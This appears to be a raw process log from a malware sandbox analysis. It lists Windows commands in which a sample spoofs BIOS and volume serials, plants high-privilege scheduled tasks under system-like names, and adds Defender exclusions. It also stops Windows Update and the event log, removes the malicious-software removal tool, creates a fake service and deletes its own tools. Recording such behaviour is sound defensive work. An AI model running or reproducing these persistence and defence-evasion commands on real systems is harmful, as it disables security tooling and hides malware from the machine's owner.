C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228805HP-TRGT24489RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Temp\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YNjaADP11G.bat"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP
Network
Files